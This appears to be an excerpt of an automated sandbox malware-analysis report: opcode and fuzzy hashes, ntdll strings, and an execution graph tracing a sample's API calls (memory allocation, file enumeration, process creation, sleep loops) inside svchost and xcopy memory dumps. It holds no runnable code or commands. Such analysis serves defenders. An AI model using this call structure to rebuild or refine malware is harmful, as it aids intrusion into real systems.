                                                          • Opcode ID: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                                          • Instruction ID: 18c4a8923d9017b505c535c34a9086cceea6c34b9e5366c63e0909e620ee77c9
                                                          • Opcode Fuzzy Hash: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                                          • Instruction Fuzzy Hash: 6190023120140803D100B6585548747000687D4301F95D511A042465CED79689516121
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                                          • Instruction ID: 48922546de11365eb2e63827ff35ded3a45b52560a1eb52c2694c6cd9b21ee5b
                                                          • Opcode Fuzzy Hash: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                                          • Instruction Fuzzy Hash: A590022160540802D140B6585458746001687D4301F95D111A0024658EC7998B5566A1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                          • Instruction ID: 4947b2c852d1bbb9d6bcd5b7e1280a91f65a64248abaac80ad49a95163ad975f
                                                          • Opcode Fuzzy Hash: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                          • Instruction Fuzzy Hash: 5290023120140802D100BA985448686000687E4301F95D111A5024659FC7A589916131
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 829bb9b762ae8f925790c83f671aa4208fa631a060d9be7762ffabc54cb6b263
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                          • Instruction ID: 282589b5143b222d48a16e6871b8351cf7c825e08d96a27db41d0a5a55bc5096
                                                          • Opcode Fuzzy Hash: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                                          • Instruction Fuzzy Hash: 2F51D9B5A04516BFCB10DF9DC9A097EF7B8BB08200B58866AE4A5D7741D334DE44CBE4
                                                          Strings
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                                          • ExecuteOptions, xrefs: 036A46A0
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                                          • Execute=1, xrefs: 036A4713
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                          • Instruction ID: 05985d717170dcfd592e2691e2d81588a5619331c743dbb5f3b07073dd2b2b65
                                                          • Opcode Fuzzy Hash: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                                          • Instruction Fuzzy Hash: 76514935A003097ADF21EBA9DC89FAE77B8EF05348F0800ADD505EB291EB719E518F54
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction ID: 4d750a17a3fadbc85023cf9ac478ac7b3aee9617a1255f6828546db23ea22687
                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction Fuzzy Hash: FA81F170E052499EDF28CF68C9957FEBBB6AF45320F9C425ED861AB390C7308851CB54
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 036A031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                          • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                                          • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                                          • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 036A7BAC
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                                          • RTL: Resource at %p, xrefs: 036A7B8E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                          • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                                          • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                                          • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                                          • RTL: Re-Waiting, xrefs: 036A72C1
                                                          • RTL: Resource at %p, xrefs: 036A72A3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                          • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                                          • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                          • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                          • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                          • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                          • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                                          • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                          • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4

                                                          Execution Graph

                                                          Execution Coverage:3%
                                                          Dynamic/Decrypted Code Coverage:4.1%
                                                          Signature Coverage:1.5%
                                                          Total number of Nodes:467
                                                          Total number of Limit Nodes:76
                                                          execution_graph 83880 a39963 83882 a3996f 83880->83882 83881 a39976 83882->83881 83884 a4b120 83882->83884 83887 a493e0 83884->83887 83886 a4b139 83886->83881 83888 a493fa 83887->83888 83889 a4940b RtlFreeHeap 83888->83889 83889->83886 83890 a3aaa0 83895 a3a7a0 83890->83895 83892 a3aaad 83911 a3a420 83892->83911 83894 a3aac9 83896 a3a7c5 83895->83896 83923 a380c0 83896->83923 83899 a3a913 83899->83892 83901 a3a92a 83901->83892 83903 a3a921 83903->83901 83906 a3aa18 83903->83906 83942 a44b40 83903->83942 83947 a39e70 83903->83947 83905 a44b40 GetFileAttributesW 83905->83906 83906->83905 83908 a3aa7d 83906->83908 83956 a3a1e0 83906->83956 83909 a4b120 RtlFreeHeap 83908->83909 83910 a3aa84 83909->83910 83910->83892 83912 a3a436 83911->83912 83920 a3a441 83911->83920 83913 a4b200 RtlAllocateHeap 83912->83913 83913->83920 83914 a3a462 83914->83894 83915 a380c0 GetFileAttributesW 83915->83920 83916 a3a775 83917 a3a78e 83916->83917 83918 a4b120 RtlFreeHeap 83916->83918 83917->83894 83918->83917 83919 a44b40 GetFileAttributesW 83919->83920 83920->83914 83920->83915 83920->83916 83920->83919 83921 a39e70 RtlFreeHeap 83920->83921 83922 a3a1e0 RtlFreeHeap 83920->83922 83921->83920 83922->83920 83924 a380df 83923->83924 83925 a380e6 GetFileAttributesW 83924->83925 83926 a380f1 83924->83926 83925->83926 83926->83899 83927 a43070 83926->83927 83928 a4307e 83927->83928 83929 a43085 83927->83929 83928->83903 83960 a34320 83929->83960 83932 a430c6 83938 a43271 83932->83938 83964 a4b200 83932->83964 83935 a430df 83936 a43267 83935->83936 83935->83938 83939 a430fb 83935->83939 83937 a4b120 RtlFreeHeap 83936->83937 83936->83938 83937->83938 83938->83903 83939->83938 83940 a4b120 RtlFreeHeap 83939->83940 83941 a4325b 83940->83941 83941->83903 83943 a44ba5 83942->83943 83944 a44bdc 83943->83944 83971 a38100 83943->83971 83944->83903 83946 a44bbe 83946->83903 83948 a39e96 83947->83948 83975 a3d8b0 83948->83975 83950 a39f08 83952 a3a090 83950->83952 83954 a39f26 83950->83954 83951 a3a075 83951->83903 83952->83951 83953 a39d30 RtlFreeHeap 83952->83953 83953->83952 83954->83951 83980 a39d30 83954->83980 83957 a3a206 83956->83957 83958 a3d8b0 RtlFreeHeap 83957->83958 83959 a3a28d 83958->83959 83959->83906 83961 a34344 83960->83961 83962 a34380 LdrLoadDll 83961->83962 83963 a3434b 83961->83963 83962->83963 83963->83932 83967 a42b30 LdrLoadDll 83963->83967 83968 a49390 83964->83968 83966 a4b21b 83966->83935 83967->83932 83969 a493ad 83968->83969 83970 a493be RtlAllocateHeap 83969->83970 83970->83966 83972 a380db GetFileAttributesW 83971->83972 83973 a3811d 83971->83973 83974 a380f1 83972->83974 83974->83946 83977 a3d8d4 83975->83977 83976 a3d8e1 83976->83950 83977->83976 83978 a4b120 RtlFreeHeap 83977->83978 83979 a3d91e 83978->83979 83979->83950 83981 a39d4d 83980->83981 83984 a3d930 83981->83984 83983 a39e53 83983->83954 83985 a3d954 83984->83985 83986 a3d9fe 83985->83986 83987 a4b120 RtlFreeHeap 83985->83987 83986->83983 83987->83986 83988 a320e0 83993 a486b0 83988->83993 83992 a3212b 83994 a486ca 83993->83994 84002 35d2c0a 83994->84002 83995 a32116 83997 a49100 83995->83997 83998 a4918c 83997->83998 83999 a49128 83997->83999 84005 35d2e80 LdrInitializeThunk 83998->84005 83999->83992 84000 a491bd 84000->83992 84003 35d2c1f LdrInitializeThunk 84002->84003 84004 35d2c11 84002->84004 84003->83995 84004->83995 84005->84000 84006 a484e0 84007 a4856c 84006->84007 84008 a48508 84006->84008 84011 35d2ee0 LdrInitializeThunk 84007->84011 84009 a4859d 84011->84009 84012 a48ee0 84013 a48f84 84012->84013 84015 a48f08 84012->84015 84014 a48f9a NtReadFile 84013->84014 84016 a4c220 84017 a4b120 RtlFreeHeap 84016->84017 84018 a4c235 84017->84018 84019 a48660 84020 a4867d 84019->84020 84023 35d2df0 LdrInitializeThunk 84020->84023 84021 a486a5 84023->84021 84024 a417e0 84026 a417f9 84024->84026 84025 a41844 84027 a4b120 RtlFreeHeap 84025->84027 84026->84025 84029 a41881 84026->84029 84031 a41886 84026->84031 84028 a41851 84027->84028 84030 a4b120 RtlFreeHeap 84029->84030 84030->84031 84032 a45d60 84033 a45dba 84032->84033 84035 a45dc7 84033->84035 84036 a43780 84033->84036 84043 a4b090 84036->84043 84038 a438c0 84038->84035 84039 a437c1 84039->84038 84040 a34320 LdrLoadDll 84039->84040 84042 a43801 84040->84042 84041 a43842 Sleep 84041->84042 84042->84038 84042->84041 84046 a491d0 84043->84046 84045 a4b0c1 84045->84039 84047 a49262 84046->84047 84049 a491f8 84046->84049 84048 a49278 NtAllocateVirtualMemory 84047->84048 84048->84045 84049->84045 84050 a38567 84052 a3856a 84050->84052 84051 a38521 84052->84051 84054 a36e70 84052->84054 84055 a36e86 84054->84055 84057 a36ebc 84054->84057 84055->84057 84058 a36ce0 LdrLoadDll 84055->84058 84057->84051 84058->84057 84059 35d2ad0 LdrInitializeThunk 84060 a29db3 84061 a29d3f 84060->84061 84062 a29dbd 84060->84062 84064 a29d61 84062->84064 84066 a29dbf 84062->84066 84063 a29dad 84064->84063 84065 a29d9a CreateThread 84064->84065 84068 a2a49b 84066->84068 84069 a4ad90 84066->84069 84070 a4adb3 84069->84070 84075 a24040 84070->84075 84072 a4adbf 84073 a4adf8 84072->84073 84078 a452f0 84072->84078 84073->84068 84082 a33040 84075->84082 84077 a2404d 84077->84072 84079 a45352 84078->84079 84081 a4535f 84079->84081 84093 a31830 84079->84093 84081->84073 84083 a3305d 84082->84083 84085 a33076 84083->84085 84086 a49af0 84083->84086 84085->84077 84088 a49b0a 84086->84088 84087 a49b39 84087->84085 84088->84087 84089 a486b0 LdrInitializeThunk 84088->84089 84090 a49b99 84089->84090 84091 a4b120 RtlFreeHeap 84090->84091 84092 a49bb2 84091->84092 84092->84085 84094 a3186b 84093->84094 84109 a37bf0 84094->84109 84096 a31873 84097 a31b40 84096->84097 84098 a4b200 RtlAllocateHeap 84096->84098 84097->84081 84099 a31889 84098->84099 84100 a4b200 RtlAllocateHeap 84099->84100 84101 a3189a 84100->84101 84102 a4b200 RtlAllocateHeap 84101->84102 84103 a318ab 84102->84103 84107 a31939 84103->84107 84124 a367e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 84103->84124 84105 a34320 LdrLoadDll 84106 a31aef 84105->84106 84120 a47c30 84106->84120 84107->84105 84110 a37c1c 84109->84110 84125 a37ae0 84110->84125 84113 a37c61 84115 a37c7d 84113->84115 84118 a49070 NtClose 84113->84118 84114 a37c49 84116 a37c54 84114->84116 84131 a49070 84114->84131 84115->84096 84116->84096 84119 a37c73 84118->84119 84119->84096 84121 a47c92 84120->84121 84123 a47c9f 84121->84123 84139 a31b50 84121->84139 84123->84097 84124->84107 84126 a37afa 84125->84126 84130 a37bd6 84125->84130 84134 a48750 84126->84134 84129 a49070 NtClose 84129->84130 84130->84113 84130->84114 84132 a4908a 84131->84132 84133 a4909b NtClose 84132->84133 84133->84116 84135 a4876d 84134->84135 84138 35d35c0 LdrInitializeThunk 84135->84138 84136 a37bca 84136->84129 84138->84136 84155 a37ec0 84139->84155 84141 a31b70 84148 a320cd 84141->84148 84159 a40e20 84141->84159 84143 a31bce 84143->84148 84162 a4c1c0 84143->84162 84145 a31d92 84167 a4c2f0 84145->84167 84148->84123 84149 a31da7 84151 a31df4 84149->84151 84173 a306b0 84149->84173 84151->84148 84153 a306b0 LdrInitializeThunk 84151->84153 84177 a37e60 84151->84177 84152 a37e60 LdrInitializeThunk 84154 a31f48 84152->84154 84153->84151 84154->84151 84154->84152 84156 a37ecd 84155->84156 84157 a37ef3 84156->84157 84158 a37eec SetErrorMode 84156->84158 84157->84141 84158->84157 84160 a4b090 NtAllocateVirtualMemory 84159->84160 84161 a40e41 84160->84161 84161->84143 84163 a4c1d6 84162->84163 84164 a4c1d0 84162->84164 84165 a4b200 RtlAllocateHeap 84163->84165 84164->84145 84166 a4c1fc 84165->84166 84166->84145 84168 a4c260 84167->84168 84169 a4b200 RtlAllocateHeap 84168->84169 84172 a4c2bd 84168->84172 84170 a4c29a 84169->84170 84171 a4b120 RtlFreeHeap 84170->84171 84171->84172 84172->84149 84174 a306cc 84173->84174 84181 a492f0 84174->84181 84178 a37e73 84177->84178 84186 a485b0 84178->84186 84180 a37e9e 84180->84151 84182 a4930d 84181->84182 84185 35d2c70 LdrInitializeThunk 84182->84185 84183 a306d2 84183->84154 84185->84183 84187 a485d8 84186->84187 84188 a4862b 84186->84188 84187->84180 84191 35d2dd0 LdrInitializeThunk 84188->84191 84189 a48650 84189->84180 84191->84189 84192 a2b430 84193 a4b090 NtAllocateVirtualMemory 84192->84193 84194 a2caa1 84192->84194 84193->84194 84195 a3f8b0 84196 a3f8cf 84195->84196 84198 a47190 84195->84198 84199 a471f5 84198->84199 84200 a47224 84199->84200 84203 a3d6b0 84199->84203 84200->84196 84202 a47206 84202->84196 84204 a3d610 84203->84204 84205 a3d68f 84204->84205 84206 a44b40 GetFileAttributesW 84204->84206 84205->84202 84206->84204 84207 a36ef0 84208 a36f0c 84207->84208 84211 a36f59 84207->84211 84210 a49070 NtClose 84208->84210 84208->84211 84209 a3708e 84212 a36f24 84210->84212 84211->84209 84218 a36310 NtClose LdrInitializeThunk LdrInitializeThunk 84211->84218 84217 a36310 NtClose LdrInitializeThunk LdrInitializeThunk 84212->84217 84214 a37068 84214->84209 84219 a364e0 NtClose LdrInitializeThunk LdrInitializeThunk 84214->84219 84217->84211 84218->84214 84219->84209 84220 a3c330 84222 a3c359 84220->84222 84221 a3c45c 84222->84221 84223 a3c400 FindFirstFileW 84222->84223 84223->84221 84225 a3c41b 84223->84225 84224 a3c443 FindNextFileW 84224->84225 84226 a3c455 FindClose 84224->84226 84225->84224 84226->84221 84227 a48d70 84228 a48e27 84227->84228 84230 a48d9f 84227->84230 84229 a48e3d NtCreateFile 84228->84229 84231 a325b5 84234 a36080 84231->84234 84233 a325e0 84235 a360b3 84234->84235 84236 a360d7 84235->84236 84241 a48bd0 84235->84241 84236->84233 84238 a360fa 84238->84236 84239 a49070 NtClose 84238->84239 84240 a3617a 84239->84240 84240->84233 84242 a48bea 84241->84242 84245 35d2ca0 LdrInitializeThunk 84242->84245 84243 a48c16 84243->84238 84245->84243 84246 a32f43 84247 a37ae0 2 API calls 84246->84247 84248 a32f53 84247->84248 84249 a49070 NtClose 84248->84249 84250 a32f6f 84248->84250 84249->84250 84251 a29dc0 84252 a2a05f 84251->84252 84253 a4ad90 13 API calls 84252->84253 84254 a2a49b 84252->84254 84253->84254 84255 a35980 84256 a37e60 LdrInitializeThunk 84255->84256 84257 a359b0 84256->84257 84259 a359fa 84257->84259 84260 a359dc 84257->84260 84261 a37de0 84257->84261 84262 a37e24 84261->84262 84267 a37e45 84262->84267 84268 a48380 84262->84268 84264 a37e35 84265 a37e51 84264->84265 84266 a49070 NtClose 84264->84266 84265->84257 84266->84267 84267->84257 84269 a483fa 84268->84269 84271 a483a8 84268->84271 84273 35d4650 LdrInitializeThunk 84269->84273 84270 a4841f 84270->84264 84271->84264 84273->84270 84274 a3f540 84275 a3f5a4 84274->84275 84276 a36080 2 API calls 84275->84276 84278 a3f6d7 84276->84278 84277 a3f6de 84278->84277 84305 a36190 84278->84305 84281 a3f883 84283 a3f77e 84284 a3f892 84283->84284 84314 a3f330 84283->84314 84285 a49070 NtClose 84284->84285 84287 a3f89c 84285->84287 84288 a3f796 84288->84284 84289 a3f7a1 84288->84289 84290 a4b200 RtlAllocateHeap 84289->84290 84291 a3f7ca 84290->84291 84292 a3f7d3 84291->84292 84293 a3f7e9 84291->84293 84295 a49070 NtClose 84292->84295 84323 a3f220 CoInitialize 84293->84323 84296 a3f7dd 84295->84296 84297 a3f7f7 84326 a48b20 84297->84326 84299 a3f872 84300 a49070 NtClose 84299->84300 84301 a3f87c 84300->84301 84302 a4b120 RtlFreeHeap 84301->84302 84302->84281 84303 a3f815 84303->84299 84304 a48b20 LdrInitializeThunk 84303->84304 84304->84303 84306 a361b5 84305->84306 84330 a489d0 84306->84330 84309 a46b90 84310 a46bf5 84309->84310 84311 a46c28 84310->84311 84335 a4011b RtlFreeHeap 84310->84335 84311->84283 84313 a46c0a 84313->84283 84315 a3f34c 84314->84315 84316 a34320 LdrLoadDll 84315->84316 84318 a3f367 84316->84318 84317 a3f370 84317->84288 84318->84317 84319 a34320 LdrLoadDll 84318->84319 84320 a3f43b 84319->84320 84321 a34320 LdrLoadDll 84320->84321 84322 a3f495 84320->84322 84321->84322 84322->84288 84325 a3f285 84323->84325 84324 a3f31b CoUninitialize 84324->84297 84325->84324 84327 a48b3d 84326->84327 84336 35d2ba0 LdrInitializeThunk 84327->84336 84328 a48b6d 84328->84303 84331 a489ed 84330->84331 84334 35d2c60 LdrInitializeThunk 84331->84334 84332 a36229 84332->84281 84332->84309 84334->84332 84335->84313 84336->84328 84353 a30c10 84354 a30c1d 84353->84354 84355 a34320 LdrLoadDll 84354->84355 84356 a30c45 84355->84356 84357 a30c8a 84356->84357 84358 a30c79 PostThreadMessageW 84356->84358 84358->84357 84359 a3fe10 84360 a3fe2d 84359->84360 84361 a34320 LdrLoadDll 84360->84361 84362 a3fe48 84361->84362 84363 a46b90 RtlFreeHeap 84362->84363 84364 a3ffd8 84362->84364 84363->84364 84365 a36b50 84366 a36b7a 84365->84366 84369 a37c90 84366->84369 84368 a36ba4 84370 a37cad 84369->84370 84376 a487a0 84370->84376 84372 a37cfd 84373 a37d04 84372->84373 84381 a48880 84372->84381 84373->84368 84375 a37d2d 84375->84368 84377 a48838 84376->84377 84378 a487c8 84376->84378 84386 35d2f30 LdrInitializeThunk 84377->84386 84378->84372 84379 a48871 84379->84372 84382 a4892e 84381->84382 84383 a488ac 84381->84383 84387 35d2d10 LdrInitializeThunk 84382->84387 84383->84375 84384 a48973 84384->84375 84386->84379 84387->84384 84388 a41450 84389 a4146c 84388->84389 84390 a41494 84389->84390 84391 a414a8 84389->84391 84392 a49070 NtClose 84390->84392 84393 a49070 NtClose 84391->84393 84394 a4149d 84392->84394 84395 a414b1 84393->84395 84398 a4b240 RtlAllocateHeap 84395->84398 84397 a414bc 84398->84397 84399 a48fd0 84400 a49047 84399->84400 84402 a48ffb 84399->84402 84401 a4905d NtDeleteFile 84400->84401 84405 a3715d 84406 a37112 84405->84406 84407 a3712f 84406->84407 84409 a3afd0 84406->84409 84410 a3aff6 84409->84410 84411 a3b21a 84410->84411 84436 a49470 84410->84436 84411->84407 84413 a3b069 84413->84411 84414 a4c2f0 2 API calls 84413->84414 84415 a3b085 84414->84415 84415->84411 84416 a3b156 84415->84416 84417 a486b0 LdrInitializeThunk 84415->84417 84418 a35900 LdrInitializeThunk 84416->84418 84420 a3b172 84416->84420 84419 a3b0e7 84417->84419 84418->84420 84419->84416 84423 a3b0f0 84419->84423 84435 a3b202 84420->84435 84442 a48220 84420->84442 84421 a3b13e 84424 a37e60 LdrInitializeThunk 84421->84424 84422 a3b11c 84457 a44470 LdrInitializeThunk 84422->84457 84423->84411 84423->84421 84423->84422 84439 a35900 84423->84439 84429 a3b14c 84424->84429 84425 a37e60 LdrInitializeThunk 84430 a3b210 84425->84430 84429->84407 84430->84407 84431 a3b1d9 84447 a482d0 84431->84447 84433 a3b1f3 84452 a48430 84433->84452 84435->84425 84437 a4948a 84436->84437 84438 a4949b CreateProcessInternalW 84437->84438 84438->84413 84440 a3593e 84439->84440 84441 a48880 LdrInitializeThunk 84439->84441 84440->84422 84441->84440 84443 a48248 84442->84443 84444 a4829a 84442->84444 84443->84431 84458 35d39b0 LdrInitializeThunk 84444->84458 84445 a482bf 84445->84431 84448 a4834d 84447->84448 84450 a482fb 84447->84450 84459 35d4340 LdrInitializeThunk 84448->84459 84449 a48372 84449->84433 84450->84433 84453 a484ad 84452->84453 84455 a4845b 84452->84455 84460 35d2fb0 LdrInitializeThunk 84453->84460 84454 a484d2 84454->84435 84455->84435 84457->84421 84458->84445 84459->84449 84460->84454
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 00A3C411
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 00A3C44E
                                                          • FindClose.KERNELBASE(?), ref: 00A3C459
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 880405b9f063646903a57b2c403edebd071f7c21b568c4f2c2febc45c5eb6344
                                                          • Instruction ID: 1a4af27b1587d04733b47a135392aa7caff6ec8d679ec57b8ad1860cc7f74505
                                                          • Opcode Fuzzy Hash: 880405b9f063646903a57b2c403edebd071f7c21b568c4f2c2febc45c5eb6344
                                                          • Instruction Fuzzy Hash: 153183B59003087BDB20EBA4DD85FFF777CDF84754F144558B908A7181DA70AA848BA0
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(1F47C30C,?,00A47C9F,00000000,00000004,00003000,?,?,?,?,?,00A47C9F,00A31BCE), ref: 00A49295
